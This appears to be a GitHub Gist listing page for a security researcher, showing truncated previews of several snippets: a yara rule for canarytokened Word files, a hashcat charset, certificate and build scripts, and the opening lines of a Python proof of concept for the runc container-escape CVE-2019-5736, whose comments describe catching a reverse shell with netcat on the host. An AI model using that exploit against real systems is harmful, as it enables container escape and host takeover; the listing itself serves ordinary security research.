Skip to content

Instantly share code, notes, and snippets.

@singe
singe / README.md
Last active Jul 8, 2021
Canarytoken'ed Word .docx yara rule
View README.md

Remember to unzip the .docx first, or use scan.sh.

Compile the yara rule for scan.sh to work yarac canarytoken.yar canarytoken

@singe
singe / sources.md
Last active Sep 28, 2020
Richard Serra & Carlota Fay Schoolman's "Television Delivers People" from March 1973
@singe
singe / README.md
Last active Sep 24, 2020
Windows Arabic Code Page (1265) for hashcat
View README.md

A Windows Arabic Code Page (CP1256) hashcat charset file. Its use is described by hashcat here. The original blog post describing it can be found at NTHashes and Encodings.

@singe
singe / Dockerfile
Last active May 29, 2020
Simple canary token binary wrapper
View Dockerfile
FROM alpine:latest as builder
LABEL maintainer="@singe at SensePost <research@sensepost.com>"
RUN apk update && apk --no-cache add \
build-base \
&& rm -rf /var/cache/apk/*
WORKDIR /
COPY yellow.c canary32.c canary32.h /
RUN gcc -o yellow yellow.c canary32.c
@singe
singe / create_certs.sh
Last active Jul 18, 2021
A simple tshark EAP certificate extractor
View create_certs.sh
#!/bin/bash
# Simple CA cert generator & leaf cert signer
# By dominic@sensepost.com
# All rights reserved 2019
ca_prefix="ca"
leaf_prefix="host"
ca_validity="1825" #days
leaf_validity="730" #days
size=2048
@singe
singe / cve-2019-5736.py
Last active Apr 16, 2021
PoC for CVE-2019-5736 in Python
View cve-2019-5736.py
#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil
import os
import stat
host='172.17.0.1'
@singe
singe / xe.sh
Created May 8, 2018
A super simple script to pull currency info from xe.com
View xe.sh
#!/bin/sh
UA="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15"
url="https://www.xe.com/currencyconverter/convert/"
amount="$1"
fromcur="$2"
tocur="$3"
if [ "$fromcur" == "" ]; then #Use default currencies
fromcur="ZAR"
tocur="GBP"
fi
@singe
singe / allowed.txt
Last active May 28, 2019
LinkedIn Top 10k Passwords Compared to Twitter Password Blacklist
View allowed.txt
123456789:allowed
linkedin:allowed
000000:allowed
linked:allowed
1234567890:allowed
222222:allowed
555555:allowed
pakistan:allowed
chocolate:allowed
Linkedin:allowed
@singe
singe / docker-for-mac-linuxkit-build.sh
Created Mar 14, 2018
A simple script to rebuild the linuxkit image used in Docker for Mac.
View docker-for-mac-linuxkit-build.sh
git clone https://github.com/linuxkit/linuxkit
cd linuxkit
currdir=$(pwd)
make
export PATH=$PATH:$currdir/bin
foo=$(grep isoEfi\ $currdir/src/cmd/linuxkit/vendor/github.com/moby/tool/src/moby/output.go|cut -d\" -f2)
docker pull $foo
cd examples
linuxkit build --format iso-efi docker-for-mac.yml
mv /Applications/Docker.app/Contents/Resources/linuxkit/docker-for-mac.iso /Applications/Docker.app/Contents/Resources/linuxkit/docker-for-mac.iso.orig
@singe
singe / request-proxy-facebook.py
Last active Jul 13, 2020
Simple Python requests to browser reverse proxy example.
View request-proxy-facebook.py
#!/usr/bin/env python3
# A simple demo of Python requests to reverse proxy
# It's an intermediate between vanilla requests and Selenium
# It let's you interact programatically, but still run JS in
# the browser, without Selenium overhead
#
# This is an example of automating aspects of Facebook
#
# by @singe